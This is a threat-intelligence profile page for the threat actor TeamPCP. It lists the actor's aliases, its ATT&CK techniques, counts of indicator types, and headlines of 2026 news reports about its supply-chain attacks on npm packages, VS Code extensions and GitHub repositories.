TeamPCP

Also known as ResoluteXBF, Replicating Marauder, UNC6780, Shellforce, PersyPCP, pcpcats, SHADOW-WATER-058, @pcpcats, Mini Shai-Hulud, xploitrsturtle2, PCPCat
Reports
42
First seen
Mar 26
Last seen
Jun 18
Motivation
financial, financial extortion, notoriety, disruption, chaos

Targeting

Sectors
technology ×23other ×2financial services ×1
Victim regions
United States ×14Brazil ×1

Top ATT&CK techniques

T1195 Supply Chain Compromise ×28T1041 Exfiltration Over C2 Channel ×25T1555 Credentials from Password Stores ×23T1005 Data from Local System ×19T1078 Valid Accounts ×17T1003 OS Credential Dumping ×10T1204 User Execution ×9T1566 Phishing ×9T1190 Exploit Public-Facing Application ×8T1547 Boot or Logon Autostart Execution ×7T1486 Data Encrypted for Impact ×7T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage ×6

Indicators

cve ×128domain ×41filename ×36ip_v4 ×24hash_sha1 ×13url ×5hash_sha256 ×5email ×2

Indicator values are available on Pro and via the API.

Associated CVEs

Recent reports

High

Intelligence Insights: June 2026 – ClearFake, Kali365, and TeamPCP Lead Threat Rankings

Red Canary
Critical

TeamPCP's supply-chain attack spree: 1,000+ compromised packages in four months

CyberScoop
Critical

GitHub dismissed security reports on flaws exploited by Shai-Hulud supply-chain worm

The Record (Recorded Future News)
High

Microsoft Restores GitHub Repos as Miasma Supply Chain Campaign Continues

The Hacker News
Critical

Miasma Worm Compromises 73 Microsoft GitHub Repositories in Supply Chain Attack

The Hacker News
Critical

IronWorm and Miasma Worm Variant Hit npm in Supply Chain Attacks

The Hacker News
High

New IronWorm malware hits 36 packages in npm supply-chain attack

Bleeping Computer
High

CERT-EU Cyber Brief May 2026 – Espionage, Supply-Chain Attacks, and Ransomware Infrastructure Disruption

CERT-EU Threat Intel
High

Red Hat removes tainted packages after software pipeline compromise

The Record (Recorded Future News)
High

Red Hat npm packages compromised in supply-chain attack distributing Miasma credential stealer

Bleeping Computer
Info

Container security: attack vectors from escapes to supply chain compromise

Kaspersky Securelist
Critical

Malicious Sicoob NuGet and npm Packages Steal Banking Credentials and Cloud Secrets

The Hacker News
High

TeamPCP stole GitHub's internal repos

Risky Business
Critical

Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos

The Hacker News
Critical

Megalodon GitHub Attack Compromises 5,561 Repos with Malicious CI/CD Workflows

The Hacker News
Critical

GitHub breach linked to malicious Nx Console VS Code extension in TanStack supply-chain attack

Bleeping Computer
High

GitHub Internal Repositories Breached via Compromised Nx Console VS Code Extension

The Hacker News
High

Grafana breach caused by missed token rotation after TanStack attack

Bleeping Computer
High

GitHub internal repositories exfiltrated via poisoned VS Code extension

CyberScoop
High

GitHub confirms breach by TeamPCP via poisoned VS Code extension

The Record (Recorded Future News)
Critical

GitHub Breached via Poisoned VS Code Extension; TeamPCP Exfiltrates 3,800+ Internal Repos

The Hacker News
High

GitHub confirms breach of 3,800 repos via malicious VSCode extension

Bleeping Computer
High

Grafana GitHub Breach Exposes Source Code via TanStack npm Supply Chain Attack

The Hacker News
High

GitHub investigates internal repositories breach claimed by TeamPCP

Bleeping Computer
High

GitHub internal repositories breached via malicious VS Code extension

Sophos News
Critical

Mini Shai-Hulud malware resurgence compromises hundreds of npm packages

CyberScoop
Critical

Mini Shai-Hulud Supply Chain Attack Compromises 323 npm Packages via TeamPCP

The Hacker News
High

Weekly Threat Recap: Exchange 0-Day, npm Supply Chain Attacks, Cisco Exploits

The Hacker News
High

TanStack Supply Chain Attack Impacts OpenAI Employee Devices; TeamPCP Campaign Expands

The Hacker News
High

ThreatsDay Bulletin: PAN-OS RCE, Mythos cURL Bug, AI Tokenizer Attacks, and 10+ Stories

The Hacker News

This page shows data on a 7-day delay. Free accounts get the full delayed feed; real-time reports, indicators, and the API start at $29/mo.